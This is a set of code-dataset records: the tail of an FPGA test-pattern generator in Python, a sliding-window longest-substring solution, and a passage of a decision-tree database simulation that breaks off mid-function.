int(timescale_op(self.digital_param['period']) / timescale_op(timescale))\n\t\t\t\t\t# print(self.digital_param['period_int'], type(self.digital_param['period_int']))\n\t\t\t\tm = regex1.match(line)\n\t\t\t\tif m:\n\t\t\t\t\tif m.group(5): # Combined bus\n\t\t\t\t\t\tmsb = int(m.group(4))\n\t\t\t\t\t\tlsb = int(m.group(6))\n\t\t\t\t\t\tsym2sig[m.group(1)] = (m.group(2), msb, lsb) # symbol => (bus, MSB, LSB)\n\t\t\t\t\telif m.group(3):\n\t\t\t\t\t\tsym2sig[m.group(1)] = m.group(2) + m.group(3)\n\t\t\t\t\telif m.group(2) not in self.sig2pos.keys():\n\t\t\t\t\t\tline = f.readline()\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\tsym2sig[m.group(1)] = m.group(2)\n\t\t\t\tline = f.readline()\n\t\treturn sym2sig\n\n\tdef edge_check(self, fw):\n\t\tif self.last_pos2val[self.cclk_pos] == 0:\n\t\t\tself.last_pos2val[self.cclk_pos] = 1\n\t\t\twrite_content(fw, self.last_pos2val)\n\t\t\tself.tick += 1\n\t\t\tself.total_length += 1\n\n\tdef get_bus_val(self, line_tuple, bus):\n\t\tbus_width = bus[1] - bus[2]\n\t\tbus_signal = bus_width > 0 and 1 or -1\n\t\tval = 'b'\n\t\tfor i in range(0, bus_width + bus_signal, bus_signal):\n\t\t\tbus_sig = '{}[{}]'.format(bus[0], str(bus[1] - i))\n\t\t\tbus_pos = self.sig2pos[bus_sig]\n\t\t\tbus_val = (line_tuple[bus_pos[0] - 1] >> bus_pos[1]) & 1\n\t\t\tval = val + str(bus_val)\n\t\treturn val + ' '\n\n\tdef trf2vcd(self, trf, vcd, flag=None):\n\t\ttick = 0\n\t\torder = 0\n\t\tpath_trf = os.path.join(self.path, trf)\n\t\tpath_pruned_trf = os.path.join(self.path, 'pruned_' + trf)\n\t\tpath_vcd = os.path.join(self.path, vcd)\n\t\tpos2sig = {v: k for k, v in self.sig2pos.items()}\n\t\tsig2sym = {v: k for k, v in self.sym2sig.items()}\n\t\tsorted_sym2sig_key = sorted(self.sym2sig)\n\t\tsorted_sym2sig = list(map(lambda x: (x, self.sym2sig[x]), sorted_sym2sig_key))\n\t\tsorted_exp_sym2sig = expand_bus(sorted_sym2sig) # for simple vcd2pic (expand bus)\n\t\ttitle = {\n\t\t\t'date': time.asctime(time.localtime(time.time())),\n\t\t\t'version': 'ModelSim Version 10.1c',\n\t\t\t'timescale': '1us'\n\t\t}\n\t\t# Prepare param for trf abandon\n\t\tif flag == 'bypass': # load length of vcd and bs from json file\n\t\t\tself.load_temp()\n\t\tvcd_len = self.trf_param['vcd_len']\n\t\tbs_len = 
self.trf_param['bs_len']\n\t\tx1 = 2048 - (bs_len + 3) % 2048 - 3\n\t\tif vcd_len <= 2048:\n\t\t\tend_tick = vcd_len + 1\n\t\telse:\n\t\t\tend_tick = 2049 + vcd_len - x1\n\n\t\twith open(path_trf, 'rb') as ft, open(path_vcd, 'w') as fv, open(path_pruned_trf, 'wb') as fp:\n\t\t\tfor item in title:\n\t\t\t\tfv.write('${}\\n\\t{}\\n$end\\n'.format(item, title[item]))\n\t\t\tfv.write('$scope module {}_tb $end\\n'.format(self.project_name))\n\t\t\t# Signal definition. Copy the original vcd file.\n\t\t\t# for symbol, signal in self.sym2sig.items():\n\t\t\t# print(sorted_sym2sig)\n\t\t\tfor symbol, signal in sorted_sym2sig:\n\t\t\t\tprint(symbol, signal)\n\t\t\t\tif isinstance(signal, tuple):\n\t\t\t\t\tio = self.sig2pio['{}[{}]'.format(signal[0], signal[1])] == 'input' and 'reg' or 'wire'\n\t\t\t\t\tsignal, width = '{}[{}:{}]'.format(signal[0], signal[1], signal[2]), abs(signal[1] - signal[2] + 1)\n\t\t\t\telse:\n\t\t\t\t\twidth = 1\n\t\t\t\t\tio = self.sig2pio[signal] == 'input' and 'reg' or 'wire'\n\t\t\t\tfv.write('$var {} {} {} {} $end\\n'.format(io, width, symbol, signal))\n\t\t\tfv.write('$upscope $end\\n$enddefinitions $end\\n')\n\t\t\tline = ft.read(BIN_BYTE_WIDTH) # Bytes type\n\t\t\tlast_line = None\n\t\t\twhile line:\n\t\t\t\tif tick > end_tick:\n\t\t\t\t\tfv.write('#{}'.format(order))\n\t\t\t\t\tbreak\n\t\t\t\telif 1 < tick < x1 or tick >= 2048:\n\t\t\t\t\tsym2val = {}\n\t\t\t\t\tline_tuple = struct.unpack('>' + 'B' * 16, line)\n\t\t\t\t\tfp.write(line) # generate pruned TRF file\n\t\t\t\t\tif not last_line: # first line\n\t\t\t\t\t\tfv.write('#{}\\n$dumpvars\\n'.format(order))\n\t\t\t\t\t\tfor sym, sig in self.sym2sig.items():\n\t\t\t\t\t\t\tif isinstance(sig, tuple):\n\t\t\t\t\t\t\t\tsym2val[sym] = self.get_bus_val(line_tuple, sig)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tpos = self.sig2pos.get(sig)\n\t\t\t\t\t\t\t\tif pos:\n\t\t\t\t\t\t\t\t\tsym2val[sym] = (line_tuple[pos[0] - 1] >> pos[1]) & 1\n\t\t\t\t\t\tfor sym, val in sym2val.items(): # Write all symbol + value together.\n\t\t\t\t\t\t\tfv.write('{}{}\\n'.format(val, sym))\n\t\t\t\t\t\tfv.write('$end\\n')\n\t\t\t\t\telif line != last_line:\n\t\t\t\t\t\tfv.write('#{}\\n'.format(order))\n\t\t\t\t\t\tlast_line_tuple = struct.unpack('>' + 'B' * 16, last_line)\n\t\t\t\t\t\tdiff = map(find_diff, line_tuple, last_line_tuple) # Return a list of dictionary.\n\t\t\t\t\t\tfor i, byte_dict in enumerate(diff):\n\t\t\t\t\t\t\tfor bit, val in byte_dict.items():\n\t\t\t\t\t\t\t\tpos = (i + 1, bit)\n\t\t\t\t\t\t\t\tsig = pos2sig.setdefault(pos, 0) # Signal name, string.\n\t\t\t\t\t\t\t\tif sig == 0:\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\telif sig in sig2sym: # Normal signal or distributed bus signal.\n\t\t\t\t\t\t\t\t\tsym2val[sig2sym[sig]] = val\n\t\t\t\t\t\t\t\telse: # Concentrated bus signal\n\t\t\t\t\t\t\t\t\tfor key in sig2sym:\n\t\t\t\t\t\t\t\t\t\tif re.sub(r'\\[\\d+\\]', '', sig) in key:\n\t\t\t\t\t\t\t\t\t\t\tsym2val[sig2sym[key]] = self.get_bus_val(line_tuple, key)\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tfor sym, val in sym2val.items():\n\t\t\t\t\t\t\tfv.write('{}{}\\n'.format(val, sym))\n\t\t\t\t\tlast_line = line\n\t\t\t\t\torder += 1\n\t\t\t\tline = ft.read(BIN_BYTE_WIDTH)\n\t\t\t\ttick += 1\n\n\tdef compare_trf(self, ptn, trf):\n\t\t# compare trf and ptn file, generate report.\n\t\tpos2sig = {v: k for k, v in self.sig2pos.items()}\n\t\tsig2sym = {v: k for k, v in self.sym2sig.items()}\n\t\tpath_ptn = os.path.join(self.path, ptn)\n\t\tpath_trf = os.path.join(self.path, trf)\n\t\tpath_rpt = os.path.join(self.path, 
self.file_list['RPT'])\n\t\tptn_start = 3 + self.trf_param['bs_len'] + 3\n\t\tvcd_len = self.trf_param['vcd_len']\n\t\twith open(path_ptn, 'rb') as fp, open(path_trf, 'rb') as ft, open(path_rpt, 'w') as fr:\n\t\t\tfp.seek(ptn_start * BIN_BYTE_WIDTH)\n\t\t\tptn_content = fp.read(vcd_len * BIN_BYTE_WIDTH)\n\t\t\twith open(os.path.join(self.path, 'stimulus.ptn'), 'wb') as fs:\n\t\t\t\tfs.write(ptn_content)\n\t\t\ttrf_content = ft.read()\n\t\t\tfor j in range(vcd_len):\n\t\t\t\tsym2val = {}\n\t\t\t\tptn_line = struct.unpack('>' + 'B' * 16, ptn_content[j*16:(j+1)*16])\n\t\t\t\ttrf_line = struct.unpack('>' + 'B' * 16, trf_content[j*16:(j+1)*16])\n\t\t\t\t# print(ptn_line, trf_line)\n\t\t\t\tdiff = map(find_diff, trf_line, ptn_line)\n\t\t\t\tfor i, byte_dict in enumerate(diff):\n\t\t\t\t\tfor bit, val in byte_dict.items():\n\t\t\t\t\t\tpos = (i + 1, bit)\n\t\t\t\t\t\tsig = pos2sig.setdefault(pos, 0) # Signal name, string.\n\t\t\t\t\t\tif sig == 0:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\telif sig in sig2sym: # Normal signal or distributed bus signal.\n\t\t\t\t\t\t\tsym2val[sig2sym[sig]] = val\n\t\t\t\t\t\telse: # Concentrated bus signal\n\t\t\t\t\t\t\tfor key in sig2sym:\n\t\t\t\t\t\t\t\tif re.sub(r'\\[\\d+\\]', '', sig) in key:\n\t\t\t\t\t\t\t\t\tsym2val[sig2sym[key]] = self.get_bus_val(trf_line, key)\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t# print(sym2val)\n\t\t\t\tfor sym, val in sym2val.items():\n\t\t\t\t\t# write report\n\t\t\t\t\tfr.write('Test result differs at line {}, signal {} = {}\\n'.format(j+1, self.sym2sig[sym], val))\n\n\tdef completion(self, fw):\n\t\tfor i in range(2048 - self.total_length % 2048):\n\t\t\t# fw.write(struct.pack('dd', 0, 0))\n\t\t\tfw.write(b'\\x00' * 16)\n\n\tdef write_attr(self):\n\t\twrite_path = os.path.join(self.path, self.project_name)\n\t\twith open(write_path, 'w') as fw:\n\t\t\tfw.write('\\n'.join(['%s = %s' % item for item in self.__dict__.items()]))\n\t\t\tfw.write('')\n\n\tdef write_command(self, fw):\n\t\tpos2val = {}\n\t\tfor key, flag in self.cmd2flag.items():\n\t\t\tvalue = get_sig_value(flag, self.tick)\n\t\t\tpos2val[self.cmd2pos[key]] = value\n\t\twrite_content(fw, pos2val)\n\t\tself.last_pos2val = pos2val\n\n\tdef write_bitstream(self, fw):\n\t\tpos2val = {}\n\t\tgen = self.rbt_generator(self.file_list['BIT'] + '.rbt')\n\t\t# zero_line_1 = b'\\x00' * 16\n\t\t# byte, bit = self.cclk_pos\n\t\t# zero_line_2 = b'\\x00' * (byte - 1) + struct.pack('B', 2 ** bit) + b'\\x00' * (16 - byte)\n\t\tself.base_0 = [0] * 16\n\t\tself.base_1 = [0] * 16\n\t\tfor key, flag in self.cmd2flag.items():\n\t\t\tvalue = get_sig_value(flag, self.tick)\n\t\t\tpos = self.cmd2pos[key]\n\t\t\tself.base_0[pos[0] - 1] += 2 ** pos[1] * int(value)\n\t\t\tself.base_1[pos[0] - 1] += 2 ** pos[1] * int(value)\n\t\tself.base_1[self.cclk_pos[0]-1] += 2 ** self.cclk_pos[1]\n\t\t# zero_line_1 = b'\\x00' * 9 + b'\\xc8' + b'\\x00' * 6\n\t\t# zero_line_2 = b'\\x00' * 9 + b'\\xca' + b'\\x00' * 6\n\t\tzero_line_0 = b''\n\t\tzero_line_1 = b''\n\t\tfor i in range(16):\n\t\t\tzero_line_0 += struct.pack('B', self.base_0[i])\n\t\t\tzero_line_1 += struct.pack('B', self.base_1[i])\n\t\tfor line in gen:\n\t\t\tif line[:32] == '0' * 32:\n\t\t\t\tfw.write(zero_line_0 + zero_line_1)\n\t\t\telse:\n\t\t\t\t# for key, flag in self.cmd2flag.items():\n\t\t\t\t# \tvalue = get_sig_value(flag, self.tick)\n\t\t\t\t# \tpos2val[self.cmd2pos[key]] = value\n\t\t\t\tfor i, value in enumerate(line.strip('\\n')):\n\t\t\t\t\tif i >= 32: # TODO: UGLY CODE!!!\n\t\t\t\t\t\tbreak\n\t\t\t\t\tsig = self.pos2data[i]\n\t\t\t\t\tpos = 
self.cmd2pos[sig]\n\t\t\t\t\tpos2val[pos] = value\n\t\t\t\twrite_content(fw, pos2val, base=self.base_0)\n\t\t\t\t# pos2val[self.cclk_pos] = 1\n\t\t\t\twrite_content(fw, pos2val, base=self.base_1)\n\t\t\tself.tick += 2\n\t\t\tself.total_length += 2\n\t\tdel gen\n\t\tself.last_pos2val = pos2val\n\t\tfor key, flag in self.cmd2flag.items():\n\t\t\tvalue = get_sig_value(flag, self.tick)\n\t\t\tself.last_pos2val[self.cmd2pos[key]] = value\n\t\tself.last_pos2val[self.cmd2pos['CCLK']] = 1\n\n\t# print(self.last_bs)\n\n\tdef write_nop(self, fw):\n\t\tstart = self.nop['start']\n\t\tcycle = self.nop['cycle']\n\t\t# print(start, cycle)\n\t\tfw.seek(-BIN_BYTE_WIDTH, 1) # Read last line.\n\t\tline = fw.read()\n\t\tfw.seek(0, 2)\n\t\tcclk_pos = self.cmd2pos['CCLK']\n\t\tif start == 'AFB':\n\t\t\tfor i in range(cycle):\n\t\t\t\tif self.last_pos2val[cclk_pos]:\n\t\t\t\t\tself.last_pos2val[cclk_pos] = 0\n\t\t\t\telse:\n\t\t\t\t\tself.last_pos2val[cclk_pos] = 1\n\t\t\t\twrite_content(fw, self.last_pos2val)\n\t\t\t\tself.tick += 1\n\t\t\t\tself.total_length += 1\n\t\telse:\n\t\t\tstart = int(start)\n\t\t\twhile self.tick <= start:\n\t\t\t\tfw.write(line)\n\t\t\t\tself.tick += 1\n\t\t\t\tself.total_length += 1\n\t\twrite_length(fw, self.tick)\n\t\tself.trf_param['bs_len'] = self.tick\n\n\tdef write_testbench(self, fw):\n\t\tself.total_length -= 1 # the first line will add an extra 1\n\t\tif 'normal' in self.config['command']:\n\t\t\tself.vcd_parser(fw)\n\t\telif 'legacy' in self.config['command']:\n\t\t\tself.txt_parser(fw)\n\n\t@timer\n\tdef write(self):\n\t\tpath = os.path.join(self.path, self.file_list['PTN'])\n\t\twith open(path, 'wb+') as fw:\n\t\t\twrite_mask(fw, self.cmd2pos, self.cmd2spio)\n\t\t\twrite_operator(fw, BITSTREAM_OP, 0)\n\t\t\tself.total_length += 3\n\t\t\twhile self.tick < self.bs_start:\n\t\t\t\t# print(self.tick)\n\t\t\t\tself.write_command(fw)\n\t\t\t\tself.tick += 1\n\t\t\t\tself.total_length += 1\n\t\t\tprint('Command complete')\n\t\t\tself.edge_check(fw) # Check clock edge.\n\t\t\tprint('Edge check complete')\n\t\t\tself.write_bitstream(fw)\n\t\t\tprint('Bitstream complete')\n\t\t\tself.write_nop(fw)\n\t\t\tprint('Nop complete')\n\t\t\tself.write_testbench(fw)\n\t\t\tprint('Testbench complete')\n\t\t\twrite_operator(fw, END_OP, 0)\n\t\t\tself.total_length += 1\n\t\t\tself.completion(fw)\n\t\t\tprint('2048-completion complete')\n\t\t\tself.save_temp()\n\t\t\tprint('Temp file saved')\n\t\t\tprint(\"Finished!\")\n\t\tdel fw\n\n\tdef save_temp(self):\n\t\tpath = os.path.join(self.path, \"temp.json\")\n\t\twith open(path, \"w+\") as f:\n\t\t\tjson.dump(self.trf_param, f)\n\t\t# ft = open(path, \"w+\")\n\t\t# # ft.write('\\n'.join(['%s = %s' % item for item in self.__dict__.items()]))\n\t\t# ft.write('trf_param = %s\\n' % str(self.trf_param))\n\t\t# ft.close()\n\n\tdef load_temp(self):\n\t\tpath = os.path.join(self.path, \"temp.json\")\n\t\twith open(path, \"r\") as f:\n\t\t\tself.trf_param = json.load(f)\n\t\t\tprint(self.trf_param)\n\t\t# fp = open(path, 'r')\n\t\t# for line in fp.readlines():\n\t\t# \texec('self.' 
+ line)\n\t\t# print(self.trf_param)\n\n\n\"\"\"Main process and test\"\"\"\n\n\ndef batch_build(path, tfo):\n\tfile_list_list = tfo_parser(path, tfo)\n\tfor project_path, file_list in file_list_list.items():\n\t\tpattern = PatternGen(os.path.join(path, project_path), file_list=file_list)\n\t\tpattern.write()\n\n\n# @timer\ndef test():\n\t# pattern = PatternGen(path='pin_test', tfo_file='tfo_demo.tfo')\n\t# pattern = PatternGen('CLK', 'tfo_demo.tfo', '-legacy') # Test txt(vcd) format.\n\t# pattern = PatternGen('LX200', 'mul1.tfo', '-legacy') # Test bus.\n\t# pattern = PatternGen('stage1_horizontal_double_0', 'tfo_demo.tfo', '-legacy') # Test bus.\n\t# pattern = PatternGen('test_tri', 'tfo_demo.tfo') # Test trigate bus.\n\t# pattern = PatternGen('counter', 'tfo_demo.tfo') # type: PatternGen\n\t# pattern = PatternGen('test_tri_pro', 'tfo_demo.tfo') # Test trigate bus.\n\tpattern = PatternGen('mul5', 'tfo_demo.tfo')\n\t# pattern = PatternGen('mul1', 'tfo_demo.tfo')\n\n\tpattern.write()\n\t# print(pattern.sym2sig)\n\t# print(pattern.cmd2spio)\n\t# pattern.save_temp()\n\t# pattern.load_temp()\n\t# print(pattern.sym2sig)\n\t# pattern.trf2vcd('pin_test.trf', 'p4.vcd', flag='bypass')\n\t# pattern.trf2vcd('counter.trf', 'c3.vcd', flag='bypass')\n\t# pattern.trf2vcd('m8.trf', 'm11.vcd', flag='bypass')\n\t# pattern.trf2vcd('mul1_r.trf', 'mul1_r.vcd', flag='bypass')\n\t# pattern.compare_trf('counter.ptn', 'pruned_counter.trf')\n\t# pattern.compare_trf('mul5.ptn', 'm8.trf')\n\n\t# print(dir(pattern))\n\t# print(pattern.file_list)\n\t# print('\\n'.join(['%s = %s' % item for item in pattern.__dict__.items()]))\n\n\t# from mytools import compare_ptn\n\t# compare_ptn('counter/counter.ptn', 'counter/counter.ptn.bak1207')\n\n\t# from vcd2pic.vcd2pic import vcd2pic\n\t# vcd2pic('counter/c3.vcd', 'counter/c3.jpg')\n\n\t# a = [\n\t# \t('!', 'clk'), ('\"', 'ce'), ('#', 'sr'), ('$', 'rs'),\n\t# \t('%', ('ai', 3, 0)), ('&', 'ao[3]'), (\"'\", 'ao[2]'),\n\t# \t('(', 'ao[1]'), (')', 'ao[0]')\n\t# ]\n\t# print(expand_bus(a))\n\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) == 1:\n\t\ttest()\n\telif len(sys.argv) == 3:\n\t\tpattern = PatternGen(sys.argv[1], sys.argv[2])\n\t\tpattern.write()\n\telif len(sys.argv) == 4:\n\t\tif sys.argv[3] == '-b':\n\t\t\tbatch_build(sys.argv[1], sys.argv[2])\n","sub_path":"mysite/Users/patternGen.py","file_name":"patternGen.py","file_ext":"py","file_size_in_byte":33548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"438181893","text":"'''\nLongest substring with no more than ‘k’ distinct characters\n\nProblem statement: Given a string, find the length of the longest substring in it with no more than K distinct characters.\n'''\n\n\ndef longestSubstringKChars(inputStr, k):\n ans = 0\n left = right = 0\n chars = {}\n res = []\n\n while right < len(inputStr):\n chars[inputStr[right]] = chars.get(inputStr[right], 0) + 1\n\n if len(chars) <= k:\n ans = max(ans, right - left + 1)\n res = inputStr[left:right+1]\n else:\n while len(chars) > k:\n leftChar = inputStr[left]\n if chars[leftChar] == 1:\n chars.pop(leftChar)\n else:\n chars[leftChar] -= 1\n left +=1\n right += 1\n \n return ans, res\n\nword = \"kolkata\"\nprint(longestSubstringKChars(word, 3))","sub_path":"DailyCodingProblems/src/python/longestSubstringKChars.py","file_name":"longestSubstringKChars.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"501076831","text":"#this 
will simulate the database connections\nimport math\nimport sys\nimport copy\n\n\n'''\n    Class Database:\n    This class will be used to simulate the database. The data attribute will hold the data.\n    The functions provided will be used to help the client retrieve its data\n'''\nclass Database():\n\n    ''' --------init--------\n    called when the Database object is created.\n    Inputs: a string for the text file\n    Output: the Database object\n    '''\n    def __init__(self,name,filename=None):\n        #self.name = name\n        self.data = [] #this will be a 2D matrix\n        if filename != None:\n            self.populate_data(filename)\n        self.name = name\n\n    ''' --------is_empty--------\n    called to make sure the database has data\n    Inputs: none\n    Output: boolean value if there is data or not\n    '''\n    def is_empty(self):\n        if self.data == []:\n            return True\n        else:\n            return False\n\n    ''' --------get_sum_of_decisions--------\n    counts how often each decision (class) value occurs in a column\n    Inputs: column integer and a search criteria list\n    Output: a dict mapping each value to its count\n    Note: This should only be called from get_column_information\n    '''\n    def get_sum_of_decisions(self,column,criteria):\n        keys = []\n        for i in range(len(self.data)):\n            if self.data[i][column] not in keys:\n                keys.append(self.data[i][column])\n\n        rDict = dict.fromkeys(keys)\n        for i in range(len(self.data)):\n            #check the criteria on the row\n            add_data = True\n            for j in range(len(criteria)):\n                if criteria[j][0] == -1:\n                    continue\n                elif criteria[j][0] == '<' and self.data[i][j] < criteria[j][1]:\n                    continue\n                elif criteria[j][0] == '>=' and self.data[i][j] >= criteria[j][1]:\n                    continue\n                else:\n                    #if criteria[j][0] != -1 and criteria[j][0] != self.data[i][j]:\n                    add_data = False\n            if add_data:\n                if rDict.get(self.data[i][column]) == None:\n                    rDict[self.data[i][column]] = 1\n                else:\n                    rDict[self.data[i][column]] += 1\n        return (rDict)\n\n    ''' --------get_sum_of_column--------\n    splits a column at its median and counts the rows on each side\n    Inputs: column integer and a search criteria list\n    Output: a dict with the '<' and '>=' counts\n    Note: This should only be called from get_column_information\n    '''\n    def get_sum_of_column(self,column,criteria):\n        key1 = '<'\n        key2 = '>='\n\n        keys = []\n        keys.append(key1)\n        keys.append(key2)\n        #print("keys: ", keys)\n        #print("column: %i" % column)\n        values = []\n        #print("criteria: ", criteria)\n        for i in range(len(self.data)):\n            #print("data: %f" % self.data[i][column])\n            if criteria[column][0] == -1 or (criteria[column][0] == '<' and self.data[i][column] < criteria[column][1]) or (criteria[column][0] == '>=' and self.data[i][column] >= criteria[column][1]):\n                #print("  append the value")\n                values.append(self.data[i][column])\n        values.sort()\n        #print("values: ",values)\n        value = values[int(len(values)/2)]\n        #print("value: %f" % value)\n        rDict = dict.fromkeys(keys)\n        for i in range(len(self.data)):\n            #check the criteria on the row\n            greater_increment = True\n            less_increment = True\n\n            for j in range(len(criteria)):\n                if criteria[j][0] != -1 and criteria[j][0] == '<' and self.data[i][j] >= criteria[j][1]:\n                    less_increment = False\n                elif criteria[j][0] != -1 and criteria[j][0] == '>=' and self.data[i][j] < criteria[j][1]:\n                    greater_increment = False\n\n            if less_increment and self.data[i][column] < value:\n                if rDict.get(key1) == None:\n                    rDict[key1] = 1\n                else:\n                    rDict[key1] += 1\n            elif greater_increment and self.data[i][column] >= value:\n                if rDict.get(key2) == None:\n                    rDict[key2] = 1\n                else:\n                    rDict[key2] += 1\n\n        return (rDict)\n\n
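    # NOTE (added commentary): get_sum_of_column implements a median split. For\n    # example, with column values [1, 2, 3, 4, 5] the pivot is\n    # values[int(len(values)/2)] == 3 and the returned dict is {'<': 2, '>=': 3};\n    # this is how continuous attributes are discretized into a node's two branches.\n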
    ''' --------get_column_information--------\n    Called from the outside to get values for a specific column\n    Inputs: a column value (if -1 is passed in, information for the entire\n            database is gathered) and a search criteria array\n    Output: a dict of counts\n    '''\n    def get_column_information(self,column,criteria):\n        #if column is -1, then we want to get all of the information\n        # else we just get that columns attributes\n        rDict = None\n\n        if column == -1:\n            for i in range(len(self.data[0])-1):\n                temp_dict = self.get_sum_of_column(i,criteria)\n                if rDict == None:\n                    rDict = temp_dict\n                else:\n                    for key,value in temp_dict.items():\n                        rDict[key] += value\n            return (rDict)\n        else:\n            return self.get_sum_of_column(column,criteria)\n\n    ''' --------get_column_unique_ident_length--------\n    returns the number of unique keys in a column\n    Inputs: column and search criteria\n    Output: the length\n    '''\n    def get_column_unique_ident_length(self,column,criteria):\n        rDict = self.get_sum_of_column(column,criteria)\n        return len(rDict)\n\n    ''' --------get_num_of_columns--------\n    returns the number of attributes + 1\n    Inputs: None\n    Output: the number of attributes\n    Note: Make sure you take the value and subtract by 1 if you don't want the last column\n    '''\n    def get_num_of_columns(self):\n        return len(self.data[0])\n\n    ''' --------get_num_of_rows--------\n    returns the number of rows\n    Inputs: None\n    Output: the number of rows\n    '''\n    def get_num_of_rows(self):\n        return len(self.data)\n\n    ''' --------get_class_of_row--------\n    returns the class of the row\n    Inputs: row\n    Output: the class\n    '''\n    def get_class_of_row(self,row):\n        return self.data[row][-1]\n\n    ''' --------populate_data--------\n    loads the data into the data attribute from the data file\n    Inputs: a string for the text file\n    Output: None\n    '''\n    def populate_data(self,filename):\n        try:\n            infile = open(filename,'r')\n            for line in infile:\n                line = line.strip()\n                linearr = line.split('\\t')\n                temp = []\n                if len(linearr) > 0:\n                    for item in linearr:\n                        temp.append(float(item.strip())) #get rid of whitespace\n                    self.data.append(temp)\n        except Exception as err:\n            print(err)\n\n
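    # NOTE (added commentary): populate_data expects a tab-separated text file of\n    # numeric values, one row per line, with the class label in the last column\n    # (see get_class_of_row); a non-numeric field raises in float() and is caught\n    # by the except clause above, stopping the load.\n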
    ''' --------add_row--------\n    add a row to the database\n    Inputs: row\n    Output: None\n    '''\n    def add_row(self,row):\n        self.data.append(row)\n\n    ''' --------get_row--------\n    returns the row from the database\n    Inputs: row number\n    Output: the row\n    '''\n    def get_row(self,row):\n        return self.data[row]\n\n    ''' --------get_value_from_database--------\n    returns the value from the database\n    Inputs: row and column\n    Output: the value\n    '''\n    def get_value_from_database(self,row,column):\n        return self.data[row][column]\n\n    def get_values(self,column):\n        keys = []\n        for i in range(len(self.data)):\n            keys.append(self.data[i][column])\n        return keys\n\n    ''' --------print_data--------\n    prints the data that is contained in the database\n    Inputs: None\n    Output: None\n    '''\n    def print_data(self):\n        print('-----%s------' % self.name)\n        for item in self.data:\n            print(item)\n        print('------------')\n\n    def get_database_records(self, criteria):\n        #print(self.get_value_from_database(0,self.get_num_of_columns()-2))\n        #print(self.get_value_from_database(0,self.get_num_of_columns()-1))\n        decisions = self.get_sum_of_decisions(self.get_num_of_columns()-1,criteria)\n        #print ("decisions: ",decisions)\n        #get all unique decisions\n        #for row in range(self.get_num_of_rows()):\n        #    get_row_data = True\n        #    for j in range(len(criteria)):\n        #        if criteria[j][0] == -1:\n        #            continue\n        #        elif criteria[j][0] == '<' and self.get_value_from_database(row,j) < float(criteria[j][1]):\n        #            continue\n        #        elif criteria[j][0] == '>=' and self.get_value_from_database(row,j) >= float(criteria[j][1]):\n        #            continue\n        #        else:\n        #            get_row_data = False\n        #    if get_row_data:\n        #        if decisions[self.get_value_from_database(row,self.get_num_of_columns()-1)] == None:\n        #            decisions[self.get_value_from_database(row,self.get_num_of_columns()-1)] = 1\n        #        else:\n        #            decisions[self.get_value_from_database(row,self.get_num_of_columns()-1)] += 1\n        return decisions\n'''------END OF DATABASE CLASS-----------'''\n\n\n\n\n''' --------calculate_entropy--------\n    Calculates the Shannon entropy of the counts in a dict\n    Inputs: a dict mapping keys to counts (None counts are skipped)\n    Output: the entropy as a float (natural log, i.e. nats)\n'''\ndef calculate_entropy(entropy_dict):\n    total = 0\n    for key,value in entropy_dict.items():\n        if value != None:\n            total += value\n    entropy = 0\n    for key,value in entropy_dict.items():\n        if value == None:\n            continue\n        entropy += ((value/total)*(math.log(value/total)))\n    return (entropy * -1)\n\n
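# NOTE (added commentary): worked example for calculate_entropy: with counts\n# {'a': 2, 'b': 2} the total is 4 and entropy = -(0.5*ln(0.5) + 0.5*ln(0.5))\n# = ln(2) ~= 0.693. Since math.log is the natural log this is measured in nats\n# rather than the bits of textbook ID3; the constant factor only rescales the\n# values and does not change which split maximizes the gain.\n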
''' --------update_dict--------\n    Joins two count dictionaries\n    Inputs: the destination dict (may be None) and the dict to merge in\n    Output: the merged dict\n'''\ndef update_dict(rDict,temp_dict):\n    if rDict == None:\n        return temp_dict\n    else:\n        for key,value in temp_dict.items():\n            if key not in rDict:\n                rDict[key] = value\n            elif rDict[key] == None:\n                rDict[key] = value\n            elif value != None:\n                rDict[key] += value\n        return rDict\n\n''' --------get_letter--------\n    Gives the letter for the integer given\n    Inputs: a value\n    Output: a letter\n    Note: This will not work for values above 26. This needs to be fixed\n'''\ndef get_letter(value):\n    return chr(value + 65)\n\n''' --------get_num_of_nodes--------\n    Gives the number of nodes that should be spawned from the data set\n    Inputs: the databases, column that spawns data and search criteria\n    Output: the number of nodes\n'''\ndef get_num_of_nodes(databases,column,criteria):\n    # this has been changed to always give back 2\n    return 2\n    #num_of_nodes = 0\n    #for database in databases:\n        #num = database.get_column_unique_ident(column,criteria)\n        #if num > num_of_nodes:\n            #num_of_nodes = num\n    #return num_of_nodes\n\ndef ask_databases(databases,criteria):\n    #get the classes that are a result\n    classes = None\n    for database in databases:\n        temp_classes = database.get_database_records(criteria)\n        classes = update_dict(classes,temp_classes)\n    return classes\n\n''' --------populate_database--------\n    Puts information into a database off of the search criteria\n    Inputs: the databases and search criteria\n    Output: the database\n'''\ndef populate_database(databases,criteria):\n    temp_database = Database('temp_database')\n    #print("Criteria: ",criteria)\n    for database in databases:\n        for row in range(database.get_num_of_rows()):\n            add_row = True\n\n            for j in range(len(criteria)):\n                if criteria[j][0] == -1:\n                    continue\n                elif criteria[j][0] == '<' and database.get_value_from_database(row,j) < float(criteria[j][1]):\n                    continue\n                elif criteria[j][0] == '>=' and database.get_value_from_database(row,j) >= float(criteria[j][1]):\n                    continue\n                else:\n                    add_row = False\n            if add_row:\n                temp_database.add_row(database.get_row(row))\n    return temp_database\n\n''' --------populate_temp_databases--------\n    Creates all the node databases given the column to spawn on and the search criteria\n    Inputs: the databases, temp_databases, column to spawn off of and search criteria\n    Output: the temporary databases\n'''\ndef populate_temp_databases(databases,temp_databases,column,criteria):\n    #this will need to be updated to place items nicer\n    #print("populating database with this criteria: " , criteria)\n    value = get_value_to_sort(databases, column)\n    for database in databases:\n        for row in range(database.get_num_of_rows()):\n            add_greater_row = True\n            add_lesser_row = True\n\n            for j in range(len(criteria)):\n                # exclude rows that violate an already-set criterion\n                if criteria[j][0] == '<' and database.get_value_from_database(row,j) >= criteria[j][1]:\n                    add_lesser_row = False\n                if criteria[j][0] == '>=' and 